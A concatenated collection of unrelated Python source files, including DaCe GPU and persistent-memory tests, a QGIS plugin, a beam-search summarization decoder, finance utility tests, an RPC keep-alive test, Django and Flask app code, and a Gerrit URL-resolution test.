nsdfg.add_array("ninput", [2, 2],
dace.float64,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("transient_heap", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("noutput", [2, 2],
dace.float64,
storage=dace.dtypes.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
a_trans = nstate.add_access("transient_heap")
nstate.add_edge(nstate.add_read("ninput"), None, a_trans, None, nsdfg.make_array_memlet("transient_heap"))
nstate.add_edge(a_trans, None, nstate.add_write("noutput"), None, nsdfg.make_array_memlet("transient_heap"))
a_gpu = state.add_read("input_gpu")
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {"ninput"}, {"noutput"})
wR = state.add_write("__return")
state.add_edge(state.add_read("input"), None, a_gpu, None, sdfg.make_array_memlet("input"))
state.add_edge(a_gpu, None, nsdfg_node, "ninput", sdfg.make_array_memlet("input_gpu"))
state.add_edge(nsdfg_node, "noutput", wR, None, sdfg.make_array_memlet("__return"))
result = sdfg(input=np.ones((2, 2), dtype=np.float64))
assert np.all(result == np.ones((2, 2)))
@pytest.mark.gpu
def test_persistent_gpu_transpose_regression():
@dace.program
def test_persistent_transpose(A: dace.float64[5, 3]):
return np.transpose(A)
sdfg = test_persistent_transpose.to_sdfg()
sdfg.expand_library_nodes()
sdfg.simplify()
sdfg.apply_gpu_transformations()
for _, _, arr in sdfg.arrays_recursive():
if arr.transient and arr.storage == dace.StorageType.GPU_Global:
arr.lifetime = dace.AllocationLifetime.Persistent
A = np.random.rand(5, 3)
result = sdfg(A=A)
assert np.allclose(np.transpose(A), result)
def test_alloc_persistent_register():
""" Tries to allocate persistent register array. Should fail. """
@dace.program
def lifetimetest(input: dace.float64[N]):
tmp = dace.ndarray([1], input.dtype)
return tmp + 1
sdfg: dace.SDFG = lifetimetest.to_sdfg()
sdfg.arrays['tmp'].storage = dace.StorageType.Register
sdfg.arrays['tmp'].lifetime = dace.AllocationLifetime.Persistent
try:
sdfg.validate()
raise AssertionError('SDFG should not be valid')
except dace.sdfg.InvalidSDFGError:
print('Exception caught, test passed')
def test_alloc_persistent():
@dace.program
def persistentmem(output: dace.int32[1]):
tmp = dace.ndarray([1], output.dtype, lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
tmp[0] = 0
else:
tmp[0] += 3
output[0] = tmp[0]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([1], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
value[0] = 2
csdfg(output=value)
assert value[0] == 3
csdfg(output=value)
assert value[0] == 6
del csdfg
def test_alloc_persistent_threadlocal():
@dace.program
def persistentmem(output: dace.int32[2]):
tmp = dace.ndarray([2],
output.dtype,
storage=dace.StorageType.CPU_ThreadLocal,
lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
for i in dace.map[0:2]:
tmp[i] = i
else:
for i in dace.map[0:2]:
tmp[i] += 3
output[i] = tmp[i]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([2], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
assert value[1] == 1
value[0] = 4
value[1] = 2
csdfg(output=value)
assert value[0] == 3
assert value[1] == 4
csdfg(output=value)
assert value[0] == 6
assert value[1] == 7
del csdfg
def test_alloc_multistate():
i = dace.symbol('i')
sdfg = dace.SDFG('multistate')
sdfg.add_array('A', [20], dace.float64)
sdfg.add_array('B', [20], dace.float64)
sdfg.add_transient('tmp', [i + 1], dace.float64)
init = sdfg.add_state()
end = sdfg.add_state()
s2 = sdfg.add_state()
sdfg.add_loop(init, s2, end, 'i', '0', 'i < 5', 'i + 1')
s1 = sdfg.add_state_before(s2)
ar = s1.add_read('A')
tw = s1.add_write('tmp')
s1.add_nedge(ar, tw, dace.Memlet('A[0:i+1]'))
tr = s2.add_read('tmp')
bw = s2.add_write('B')
s2.add_nedge(tr, bw, dace.Memlet('tmp'))
A = np.random.rand(20)
B = np.random.rand(20)
sdfg(A=A, B=B)
assert np.allclose(A[:5], B[:5])
def test_nested_view_samename():
@dace.program
def incall(a, b):
tmp = a.reshape([10, 2])
tmp[:] += 1
return tmp
@dace.program
def top(a: dace.float64[20]):
tmp = dace.ndarray([20], dace.float64, lifetime=dace.AllocationLifetime.Persistent)
return incall(a, tmp)
sdfg = top.to_sdfg(simplify=False)
a = np.random.rand(20)
ref = a.copy()
b = sdfg(a)
assert np.allclose(b, ref.reshape(10, 2) + 1)
def test_nested_persistent():
@dace.program
def nestpers(a):
tmp = np.ndarray([20], np.float64)
tmp[:] = a + 1
return tmp
@dace.program
def toppers(a: dace.float64[20]):
return nestpers(a)
sdfg = toppers.to_sdfg(simplify=False)
for _, _, arr in sdfg.arrays_recursive():
if arr.transient:
arr.lifetime = dace.AllocationLifetime.Persistent
a = np.random.rand(20)
b = sdfg(a)
assert np.allclose(b, a + 1)
def test_persistent_scalar():
@dace.program
def perscal(a: dace.float64[20]):
tmp = dace.define_local_scalar(dace.float64, lifetime=dace.AllocationLifetime.Persistent)
tmp[:] = a[1] + 1
return tmp
a = np.random.rand(20)
b = perscal(a)
assert np.allclose(b, a[1] + 1)
if __name__ == '__main__':
test_determine_alloc_scope()
test_determine_alloc_state()
test_determine_alloc_sdfg()
test_determine_alloc_global()
test_persistent_gpu_copy_regression()
test_persistent_gpu_transpose_regression()
test_alloc_persistent_register()
test_alloc_persistent()
test_alloc_persistent_threadlocal()
test_alloc_multistate()
test_nested_view_samename()
test_nested_persistent()
test_persistent_scalar()
|
py | 1a3898af9312d2016a1e8aba2d9c51379400ca12 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
SeaIceData
A QGIS plugin
Downloads sea ice concentration data from NSIDC
-------------------
begin : 2014-10-02
copyright : (C) 2014 by Louise Ireland
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
# Initialize Qt resources from file resources.py
import resources
# Import the code for the dialog
from seaicedatadialog import SeaIceDataDialog
import os.path
class SeaIceData:
def __init__(self, iface):
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value("locale/userLocale")[0:2]
localePath = os.path.join(self.plugin_dir, 'i18n', 'seaicedata_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Create the dialog (after translation) and keep reference
self.dlg = SeaIceDataDialog()
def initGui(self):
# Create action that will start plugin configuration
self.action = QAction(
QIcon(":/plugins/seaicedata/icon.png"),
u"Sea Ice Data Downloader", self.iface.mainWindow())
# connect the action to the run method
self.action.triggered.connect(self.run)
# Add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu(u"&Sea Ice Data Downloader", self.action)
def unload(self):
# Remove the plugin menu item and icon
self.iface.removePluginMenu(u"&Sea Ice Data Downloader", self.action)
self.iface.removeToolBarIcon(self.action)
# run method that performs all the real work
def run(self):
# show the dialog
self.dlg.show()
|
py | 1a3898d098108abc211b8aed93df53f699218c12 | import inspect
import logging
from typing import Any, Dict, Optional
from panoramic.cli.husky.common.exception_enums import (
ComponentType,
ExceptionGroup,
ExceptionSeverity,
)
from panoramic.cli.husky.common.util import exception_to_string_with_traceback
logger = logging.getLogger(__name__)
class ExceptionTags:
REQUEST_DATA = '_request_data'
class ExceptionHandler:
@classmethod
def track_exception(
cls,
exc: Exception,
exc_group: ExceptionGroup = ExceptionGroup.COMMON,
message: Optional[str] = None,
ddog_tags: Optional[Dict[str, Any]] = None,
severity: ExceptionSeverity = ExceptionSeverity.error,
component: ComponentType = ComponentType.UNKNOWN,
):
"""
Attempt to have one fn logging to stderr, datadog
Let's see how this works for us and we can change later or add it to python lib.
"""
caller_frame = inspect.stack()[1]
called_by = f'File {caller_frame.filename}, line {caller_frame.lineno}, in {caller_frame.function}'
ddog_tags = ddog_tags or dict()
ddog_tags['exception_type'] = type(exc).__name__
ddog_tags['exception_group'] = exc_group.value
ddog_tags['component'] = component.value
ddog_tags['severity'] = severity.value
all_tags = dict()
all_tags.update(ddog_tags)
request_data_str = '<not-set>'
if ExceptionTags.REQUEST_DATA in all_tags:
# Log request data separately, not inside tags, coz it adds one more level of json escaping and is even
# crazier to read
request_data_str = str(all_tags[ExceptionTags.REQUEST_DATA])
del all_tags[ExceptionTags.REQUEST_DATA]
logger.error(
f'Message: {message} Called by: {called_by}. '
f'Exception: {exception_to_string_with_traceback(exc)} Tags: {all_tags} '
f'{request_data_str}'
)
|
py | 1a389bc6f3123960a7671695851354197e9a29ca | #Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/
from __future__ import unicode_literals, print_function, division
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
import imp
imp.reload(sys)
import os
import time
import torch
from torch.autograd import Variable
import sys
sys.path.append('/home/kxiao/pointer_generator_pytorch/')
from data_util.batcher import Batcher
from data_util.data import Vocab
from data_util import data, config
from model import Model
from data_util.utils import write_for_rouge, rouge_eval, rouge_log
from train_util import get_input_from_batch
use_cuda = config.use_gpu and torch.cuda.is_available()
class Beam(object):
def __init__(self, tokens, log_probs, state, context, coverage):
self.tokens = tokens
self.log_probs = log_probs
self.state = state
self.context = context
self.coverage = coverage
def extend(self, token, log_prob, state, context, coverage):
return Beam(tokens = self.tokens + [token],
log_probs = self.log_probs + [log_prob],
state = state,
context = context,
coverage = coverage)
@property
def latest_token(self):
return self.tokens[-1]
@property
def avg_log_prob(self):
return sum(self.log_probs) / len(self.tokens)
class BeamSearch(object):
def __init__(self, model_file_path):
model_name = os.path.basename(model_file_path)
self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))
self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')
self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')
for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:
if not os.path.exists(p):
os.mkdir(p)
self.vocab = Vocab(config.vocab_path, config.vocab_size)
self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',
batch_size=config.beam_size, single_pass=True)
time.sleep(15)
self.model = Model(model_file_path, is_eval=True)
def sort_beams(self, beams):
return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)
def decode(self):
start = time.time()
counter = 0
batch = self.batcher.next_batch()
# ๆฐ็ๆถๆ้ๅๅจ่ฎญ็ป็decode้จๅ
while batch is not None:
# Run beam search to get best Hypothesis
best_summary = self.beam_search(batch)
# Extract the output ids from the hypothesis and convert back to words
output_ids = [int(t) for t in best_summary.tokens[1:]]
decoded_words = data.outputids2words(output_ids, self.vocab,
(batch.art_oovs[0] if config.pointer_gen else None))
# Remove the [STOP] token from decoded_words, if necessary
try:
fst_stop_idx = decoded_words.index(data.MARK_EOS)
decoded_words = decoded_words[:fst_stop_idx]
except ValueError:
decoded_words = decoded_words
original_abstract_sents = batch.original_abstracts_sents[0]
original_article = batch.original_articles[0]
# ่ฑๆ
# write_for_rouge(original_abstract_sents, decoded_words, counter,
# self._rouge_ref_dir, self._rouge_dec_dir)
# ไธญๆ
self.write_result(original_article, original_abstract_sents,
decoded_words, counter)
counter += 1
# if counter % 1000 == 0:
# print('%d example in %d sec'%(counter, time.time() - start))
# start = time.time()
batch = self.batcher.next_batch()
# print("Decoder has finished reading dataset for single_pass.")
# print("Now starting ROUGE eval...")
# results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)
# rouge_log(results_dict, self._decode_dir)
def write_result(self, original_title, reference_summarization,
decoded_words, ex_index):
"""
Write output to file.
Args:
reference_sents: list of strings
decoded_words: list of strings
ex_index: int, the index with which to label the files
"""
summarization = ''.join(decoded_words)
# Write to file
result_file = os.path.join(self._decode_dir, "result.txt")
with open(result_file, 'w') as f:
f.write(
original_title + '\t\t' +
reference_summarization + '\t\t' +
summarization + "\n")
print("Wrote example %i to file" % ex_index)
def beam_search(self, batch):
#batch should have only one example
enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \
get_input_from_batch(batch, use_cuda)
encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)
s_t_0 = self.model.reduce_state(encoder_hidden)
dec_h, dec_c = s_t_0 # 1 x 2*hidden_size
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
#decoder batch preparation, it has beam_size example initially everything is repeated
beams = [Beam(tokens=[self.vocab.word2id(data.MARK_GO)],
log_probs=[0.0],
state=(dec_h[0], dec_c[0]),
context = c_t_0[0],
coverage=(coverage_t_0[0] if config.is_coverage else None))
for _ in range(config.beam_size)]
results = []
steps = 0
while steps < config.max_dec_steps and len(results) < config.beam_size:
latest_tokens = [h.latest_token for h in beams]
latest_tokens = [t if t < self.vocab.size() else self.vocab.word2id(data.MARK_UNK) \
for t in latest_tokens]
y_t_1 = Variable(torch.LongTensor(latest_tokens)) # ๅ้
if use_cuda:
y_t_1 = y_t_1.cuda()
all_state_h =[]
all_state_c = []
all_context = []
for h in beams:
state_h, state_c = h.state
all_state_h.append(state_h)
all_state_c.append(state_c)
all_context.append(h.context)
s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))
c_t_1 = torch.stack(all_context, 0)
coverage_t_1 = None
if config.is_coverage:
all_coverage = []
for h in beams:
all_coverage.append(h.coverage)
coverage_t_1 = torch.stack(all_coverage, 0)
final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,
encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,
extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps)
log_probs = torch.log(final_dist)
topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)
dec_h, dec_c = s_t
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
all_beams = []
num_orig_beams = 1 if steps == 0 else len(beams)
for i in range(num_orig_beams): # ๅฏนไบไธๅ็ๅฅๅญ
h = beams[i]
state_i = (dec_h[i], dec_c[i])
context_i = c_t[i]
coverage_i = (coverage_t[i] if config.is_coverage else None)
for j in range(config.beam_size * 2): # for each of the top 2*beam_size hyps:
new_beam = h.extend(token=topk_ids[i, j].item(),
log_prob=topk_log_probs[i, j].item(),
state=state_i,
context=context_i,
coverage=coverage_i)
all_beams.append(new_beam)
beams = []
for h in self.sort_beams(all_beams):
if h.latest_token == self.vocab.word2id(data.MARK_EOS):
if steps >= config.min_dec_steps:
results.append(h)
else:
beams.append(h)
if len(beams) == config.beam_size or len(results) == config.beam_size:
break
steps += 1
if len(results) == 0:
results = beams
beams_sorted = self.sort_beams(results)
return beams_sorted[0]
if __name__ == '__main__':
model_filename = sys.argv[1]
beam_Search_processor = BeamSearch(model_filename)
beam_Search_processor.decode()
|
py | 1a389c95837ece8fc1331f7409f66ac81065d496 | import math
import unittest
from datetime import datetime, timedelta
from decimal import Decimal
from unittest.mock import patch
import pandas as pd
import pytz
from src.constants import ZERO
from src.dto.attempt_dto import AttemptDTO
from src.utils.utils import Utils as Utilities
from tests.utils.utils import Utils
class UtilsTestCase(unittest.TestCase):
def test_valid(self):
valid = Utilities.valid(Decimal('1'), Decimal('2'), Decimal('3'))
self.assertEqual(valid, True)
valid = Utilities.valid(Decimal('3'), Decimal('2'), Decimal('3'))
self.assertEqual(valid, False)
valid = Utilities.valid(Decimal('1'), Decimal('2'), Decimal('1'))
self.assertEqual(valid, False)
def test_negation(self):
negation = Utilities.negation()
self.assertIsInstance(negation, Decimal)
self.assertGreaterEqual(negation, Decimal('-1'))
self.assertLessEqual(negation, Decimal('1'))
def test_inverse(self):
inverse = Utilities.inverse()
self.assertIsInstance(inverse, Decimal)
self.assertGreaterEqual(inverse, ZERO)
self.assertLessEqual(inverse, math.inf)
def test_group(self):
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
group = Utilities.group(3, iterable)
self.assertTupleEqual(group, ((1, 2, 3), (4, 5, 6), (7, 8, 9)))
group = Utilities.group(2, iterable)
self.assertTupleEqual(group, ((1, 2), (3, 4), (5, 6), (7, 8)))
def test_number(self):
number = Utilities.number(Decimal('6.3'), Decimal('2.4'))
self.assertEqual(number, Decimal('2'))
number = Utilities.number(Decimal('9.2'), Decimal('2.9'))
self.assertEqual(number, Decimal('3'))
number = Utilities.number(ZERO, ZERO)
self.assertEqual(number, ZERO)
def test_day_delta_value(self):
dates = pd.date_range('1/1/2000', periods=15, freq='8h')
tickers = ['AAA', 'BBB']
frame = pd.DataFrame(index=dates, columns=tickers)
for i in range(frame.shape[0]):
for j in range(frame.shape[1]):
frame.iloc[i][j] = i + j
frame.sort_index(inplace=True, ascending=True)
date = frame.index.max()
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('1'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('1'))
self.assertEqual(value_aaa, Decimal('11'))
self.assertEqual(value_bbb, Decimal('12'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('2'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('2'))
self.assertEqual(value_aaa, Decimal('8'))
self.assertEqual(value_bbb, Decimal('9'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('3'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('3'))
self.assertEqual(value_aaa, Decimal('5'))
self.assertEqual(value_bbb, Decimal('6'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('10'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('10'))
self.assertTrue(math.isnan(value_aaa))
self.assertTrue(math.isnan(value_bbb))
@patch('src.utils.utils.Utils.now')
def test_is_today(self, now):
today = pytz.utc.localize(datetime.fromisoformat('2011-11-04T00:00:00'))
now.return_value = today
self.assertTrue(Utilities.is_today(today))
self.assertTrue(Utilities.is_today(today + timedelta(microseconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(milliseconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(seconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(minutes=23)))
self.assertTrue(Utilities.is_today(today + timedelta(hours=23)))
self.assertFalse(Utilities.is_today(today + timedelta(hours=24)))
self.assertFalse(Utilities.is_today(today + timedelta(days=1)))
self.assertFalse(Utilities.is_today(today + timedelta(weeks=52)))
self.assertFalse(Utilities.is_today(None))
@patch('src.utils.utils.Utils.now')
def test_is_working_day_ny(self, now):
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-05T12:00:00'))
self.assertTrue(Utilities.is_working_day_ny())
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-06T12:00:00'))
self.assertFalse(Utilities.is_working_day_ny())
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-04T12:00:00'))
self.assertFalse(Utilities.is_working_day_ny())
def test_first(self):
self.assertIsNone(Utilities.first([]))
self.assertEqual(Utilities.first([1]), 1)
self.assertEqual(Utilities.first([1, 2]), 1)
def test_assert_attributes(self):
attempt = AttemptDTO()
Utilities.set_attributes(attempt, amount_buy=Decimal('1'), distance_buy=Decimal('2'), delta_buy=Decimal('3'),
amount_sell=Decimal('4'), distance_sell=Decimal('5'), delta_sell=Decimal('6'))
self.assertIsInstance(attempt, AttemptDTO)
Utils.assert_attributes(attempt, amount_buy=Decimal('1'), distance_buy=Decimal('2'), delta_buy=Decimal('3'),
amount_sell=Decimal('4'), distance_sell=Decimal('5'), delta_sell=Decimal('6'))
def test_truncate(self):
self.assertEqual(Utilities.truncate(Decimal('0.5')), ZERO)
self.assertEqual(Utilities.truncate(Decimal('-0.5')), ZERO)
self.assertEqual(Utilities.truncate(Decimal('1.2')), Decimal('1'))
self.assertEqual(Utilities.truncate(Decimal('-1.2')), Decimal('-1'))
self.assertEqual(Utilities.truncate(Decimal('1.9')), Decimal('1'))
self.assertEqual(Utilities.truncate(Decimal('-1.9')), Decimal('-1'))
self.assertEqual(Utilities.truncate(Decimal('10')), Decimal('10'))
self.assertEqual(Utilities.truncate(Decimal('-10')), Decimal('-10'))
if __name__ == '__main__':
unittest.main()
|
py | 1a389ce37247ccc55625cd5b6811a03f3769fc41 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import KabberryTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (KabberryTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because kabberryd should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
py | 1a389e8e762cb33845958ad51bdaa1831a8ae682 | from __future__ import unicode_literals
import os
from django.db import models
from django.template.loader import get_template
from django.dispatch import receiver
from base.models import TimeStamp
from modeller.models import ModelObject
from endpoint.models import EndPoint
from .utils import startapp_v2, app_management_command
from .signals import models_ready
import logging
logger = logging.getLogger(__name__)
class App(TimeStamp):
project = models.ForeignKey('project.Project')
name = models.SlugField(max_length=50, unique=True)
need_migration = models.BooleanField(default=True)
created_by = models.ForeignKey('auth.User', null=True, blank=True)
class Meta:
unique_together = ("name", "project")
def __unicode__(self):
return "{0}-{1}".format(self.project, self.name)
def total_models(self):
return self.modelobject_set.count()
@property
def name_lower(self):
"""
"""
return self.name.lower()
@property
def app_code_name(self):
"""
Returns appname as string appended with UUID,
which is used as app folder name"""
return "_{1}_{0}".format(self.name, self.project_id.hex)
def source_code_available(self):
"""
"""
return os.path.isdir(
"{0}/apps/{1}/".format(
self.project.project_dir(), self.name_lower))
def generate_codes(self):
"""
Generates source codes, this method is
equivalent to django startapp command.
"""
if not self.source_code_available():
startapp_v2(
self.name_lower,
project_dir=self.project.project_dir())
return True
else:
return False
def write_models(self):
# Need to Depricate below codes
self.need_migration = True
self.save()
####
template = get_template('modeller/base_models.py')
context = {
'model_objects': ModelObject.objects.filter(app=self)
}
result = template.render(context)
f = open(
'{1}/apps/{0}/models.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
f.write(result)
f.close()
# Writes an empty file in methods folder
model_list = list()
for model in self.modelobject_set.all():
model_list.append(model.name.lower())
model_file = open(
'{1}/apps/{0}/methods/{2}.py'.format(
self.name_lower,
self.project.project_dir(),
model.name.lower()),
'w')
model_file.write('')
model_file.close()
# Writes import in __init__ file of methods folder
init_file = open(
'{1}/apps/{0}/methods/__init__.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
imports = ','.join(model_list)
init_file.write('import {0}'.format(imports))
init_file.close()
models_ready.send(
sender=None, project_name=self.project.clean_project_name)
return True
def makemigrations(self):
# call_command('makemigrations', self.app_code_name, interactive=False)
app_management_command(
self.name_lower,
self.project.project_dir(),
'makemigrations'
)
def migrate(self):
# call_command('migrate', self.app_code_name, interactive=False)
app_management_command(
self.name_lower,
self.project.project_dir(),
'migrate'
)
def get_default_endpoints(self):
endpoints = list()
# endpoints.append(args)
for model in self.modelobject_set.all():
endpoints += model.get_default_endpoints()
return endpoints
def write_views(self):
template = get_template('endpoint/base_views.py')
context = {
'endpoints': EndPoint.objects.filter(app=self)
}
result = template.render(context)
f = open(
'{1}/apps/{0}/autogen_views.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
f.write(result)
f.close()
def prepare_app(self):
print "Writting models"
self.write_models()
print "Running Makemigrations"
self.makemigrations()
def save(self, *args, **kwargs):
if self._state.adding is True:
self.generate_codes()
return super(self.__class__, self).save(*args, **kwargs)
@receiver(models_ready)
def restart_server(project_name, **kwargs):
print "Restarting the server"
print project_name
try:
os.system(
"~/./webapps/{0}/apache2/bin/restart".format(
project_name))
print "Server Restarted.."
except Exception as e:
logger.exception(e)
print "Couldnt not restart the server"
|
py | 1a389f06bfe1ae5d7a830bc6bd2e2d707e91997f | from flask import Flask, render_template
from application.models import Vehicles
from sqlalchemy import desc
from application import app, db
import requests
@app.route('/')
def index():
make = requests.get('http://make_api:5001/get_make')
model = requests.get('http://model_api:5002/get_model')
mot = requests.post('http://mot_api:5003/get_mot', json={'make':make.text, 'model':model.text})
vehicle = Vehicles(make = make.text, model = model.text, mot = mot.text)
db.session.add(vehicle)
db.session.commit()
vehicles = Vehicles.query.order_by(Vehicles.id.desc()).limit(5)
return render_template ('index.html', make=make.text, model=model.text, vehicles=vehicles, mot=mot.text)
|
py | 1a389f552c4818c6424a4569fd1752ac3ff20814 | #!/usr/bin/env python
# Copyright (C) 2013 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from util import resolve_url
class TestResolveUrl(unittest.TestCase):
""" run to test:
python -m unittest -v util_test
"""
def testKnown(self):
url = resolve_url('GERRIT:foo.jar', {})
self.assertEqual(url,
'http://gerrit-maven.storage.googleapis.com/foo.jar')
def testKnownRedirect(self):
url = resolve_url('MAVEN_CENTRAL:foo.jar',
{'MAVEN_CENTRAL': 'https://my.company.mirror/maven2'})
self.assertEqual(url, 'https://my.company.mirror/maven2/foo.jar')
def testCustom(self):
url = resolve_url('https://maven.example.com/release/foo.jar', {})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
def testCustomRedirect(self):
url = resolve_url('MAVEN_EXAMPLE:foo.jar',
{'MAVEN_EXAMPLE':
'https://maven.example.com/release'})
self.assertEqual(url, 'https://maven.example.com/release/foo.jar')
if __name__ == '__main__':
unittest.main()
|
py | 1a389f9bf0d4dfbee2db5173721c62a0e31fb562 | from dash.orgs.views import OrgPermsMixin
from smartmin.views import SmartCreateView, SmartCRUDL, SmartDeleteView, SmartListView, SmartReadView, SmartUpdateView
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.models import User
from django.http import Http404, HttpResponse, JsonResponse
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from casepro.cases.mixins import PartnerPermsMixin
from casepro.cases.models import Partner
